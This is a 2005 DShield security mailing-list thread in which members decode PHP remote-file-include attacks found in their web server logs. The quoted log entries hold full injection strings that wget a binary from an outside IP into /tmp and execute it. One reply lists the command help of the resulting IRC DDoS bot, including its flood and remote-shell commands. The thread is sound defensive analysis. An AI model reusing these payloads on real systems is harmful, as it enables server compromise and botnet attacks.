[Dshield] Can Someone Decipher This Log Entry?

DAN MORRILL dan_20407 at msn.com
Thu Dec 22 14:42:20 GMT 2005


Good Morning,

Seeing the same thing off my systems, ISS is calling it:

PHP include worm infects search engine-listed sites 
(HTTP_Spyki_PhpInclude_Worm)
About this signature or vulnerability This signature detects attacks against 
PHP sites attempted by the PhpInclude.Worm.

:arg 
phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|

:URL	/modules/Forums/admin/admin_styles.phpadmin_styles.php

Hope this helps,
r/d


Sometimes MSN E-mail will indicate that the mesasge failed to be delivered. 
Please resend when you get those, it does not mean that the mail box is bad, 
merely that MSN mail is over worked at the time.



>
>Stephanie -- Excellent Analysis.
>
>Short end of the stick...  I've seen tons of these hit my machine
>lately, and I usually download the code and let it connect just for
>fun..  (oh yeah, then I tell #dshield about it in irc.freenode.net
>and it usually gets shut down post haste)
>
>it's an IRC connector/remote shell client thingy (i know that's
>technical) for botnet usage.  I have about 4 different types on my
>machine in a folder called  "fun".
>
>Joel
>
>
>On Dec 22, 2005, at 5:30 AM, Stephane Grobety wrote:
>
> > Hello David,
> >
> > I've masked part of the IP you provided in your message, just in case
> > in case. It's a bit silly considering you didn't do the same, but,
> > well, it does no additional harm...
> >
> > it looks like that this is an attempt to exploit a flaw in the Mambo
> > content management software (looks like it's this one:
> > http://secunia.com/advisories/14337/).
> >
> > If the exploit succeeds, it will try to wget a file called "micu" from
> > XXX.136.48.69 into the /tmp folder and execute it.
> >
> > At this moment, that server is still serving the file so I checked it.
> > What it does is try to download and execute two more files: "mare"
> > and "ro"
> >
> > "mare" isn't available on the remote server but "ro" is. it looks like
> > an ELF executable. Now, I'm not a specialist of that file format so
> > I may be completely wrong here but this looks like a Linux x86
> > executable file. It seems to link the /lib/ld-linux.so.2 library and
> > import a bunch of functions that you expect from a IP server program.
> > It also contains a number of strings that indicates that it might try
> > to contact an IRC server (*.undernet.org). It also has a nice internal
> > help that is probably intended to be used by the attacker:
> >
> > NOTICE %s :Current status is: %s.
> > NOTICE %s :Already disabled.
> > NOTICE %s :Password too long! > 254
> > NOTICE %s :Disable sucessful.
> > NOTICE %s :ENABLE <pass>
> > NOTICE %s :Already enabled.
> > NOTICE %s :Wrong password
> > NOTICE %s :Password correct.
> > NOTICE %s :Removed all spoofs
> > NOTICE %s :What kind of subnet address is that? Do something like:
> > 169.40
> > NOTICE %s :Unable to resolve %s
> > NOTICE %s :UDP <target> <port> <secs>
> > NOTICE %s :Packeting %s.
> > NOTICE %s :PAN <target> <port> <secs>
> > NOTICE %s :Panning %s.
> > NOTICE %s :TSUNAMI <target> <secs>
> > NOTICE %s :Tsunami heading for %s.
> > NOTICE %s :UNKNOWN <target> <secs>
> > NOTICE %s :Unknowning %s.
> > NOTICE %s :MOVE <server>
> > NOTICE %s :TSUNAMI <target> <secs>                          =
> > Special packeter that wont be blocked by most firewalls
> > NOTICE %s :PAN <target> <port> <secs>                       = An
> > advanced syn flooder that will kill most network drivers
> > NOTICE %s :UDP <target> <port> <secs>                       = A udp
> > flooder
> > NOTICE %s :UNKNOWN <target> <secs>                          =
> > Another non-spoof udp flooder
> > NOTICE %s :NICK <nick>                                      =
> > Changes the nick of the client
> > NOTICE %s :SERVER <server>                                  =
> > Changes servers
> > NOTICE %s :GETSPOOFS                                        = Gets
> > the current spoofing
> > NOTICE %s :SPOOFS <subnet>                                  =
> > Changes spoofing to a subnet
> > NOTICE %s :DISABLE                                          =
> > Disables all packeting from this client
> > NOTICE %s :ENABLE                                           =
> > Enables all packeting from this client
> > NOTICE %s :KILL                                             = Kills
> > the client
> > NOTICE %s :GET <http address> <save as>                     =
> > Downloads a file off the web and saves it onto the hd
> > NOTICE %s :VERSION                                          =
> > Requests version of client
> > NOTICE %s :KILLALL                                          = Kills
> > all current packeting
> > NOTICE %s :HELP                                             =
> > Displays this
> > NOTICE %s :IRC <command>                                    = Sends
> > this command to the server
> > NOTICE %s :SH <command>                                     =
> > Executes a command
> > NOTICE %s :Killing pid %d.
> >
> > So what this looks like is a client for a DDoS botnet.
> >
> > Other entries in the program seems to indicate it's been compiled on a
> > Debian system:
> >
> > /home/drow/debian-glibc/
> >
> > There is also something that looks very much like an HTTP request:
> >
> > GET /%s HTTP/1.0
> > Connection: Keep-Alive
> > User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
> > Host: %s:80
> > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/
> > png, */*
> > Accept-Encoding: gzip
> > Accept-Language: en
> > Accept-Charset: iso-8859-1,*,utf-8
> >
> > It would be interesting to see if the request matches your log entry:
> > I think the above request is part of the exploit code.
> >
> > I did a bit of google research and found several DDoS client that are
> > apparently based on the same code that contains the same string
> > literals.
> >
> > That's all I can say about this... The attacker is still up and
> > running and probably still scanning networks trying to drop it's
> > maleware.
> >
> > Good luck,
> > Stephane
> >
> >
> > Wednesday, December 21, 2005, 10:53:14 PM, you wrote:
> >
> > DCH> I have about 25 of these today. I've added index2.php to the
> > firewall watcher.
> > DCH> I cannot make sense of this Apache print:
> >
> > DCH> 85.190.1.171 - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?
> > option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]
> > =com_content&_REQUEST[Itemid]
> > =1&GLOBALS=&mosConfig_absolute_path=http://XXX.136.48.69/cmd.gif?
> > &cmd=cd%20/tmp;wget%20XXX.136.48.69/micu;chmod%20744%20micu;./
> > micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"
> >
> >
> >
> >
> > --
> > Best regards,
> >  Stephane                            mailto:security at admin.fulgan.com
> >
> > _________________________________________
> > Learn about Intrusion Detection in Depth from the comfort of your
> > own couch:
> > https://www.sans.org/athome/details.php?id=1341&d=1
> >
> > _______________________________________________
> > send all posts to list at lists.dshield.org
> > To change your subscription options (or unsubscribe), see: http://
> > www.dshield.org/mailman/listinfo/list
>
>_________________________________________
>Learn about Intrusion Detection in Depth from the comfort of your own 
>couch:
>https://www.sans.org/athome/details.php?id=1341&d=1
>
>_______________________________________________
>send all posts to list at lists.dshield.org
>To change your subscription options (or unsubscribe), see: 
>http://www.dshield.org/mailman/listinfo/list

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today - it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/



More information about the list mailing list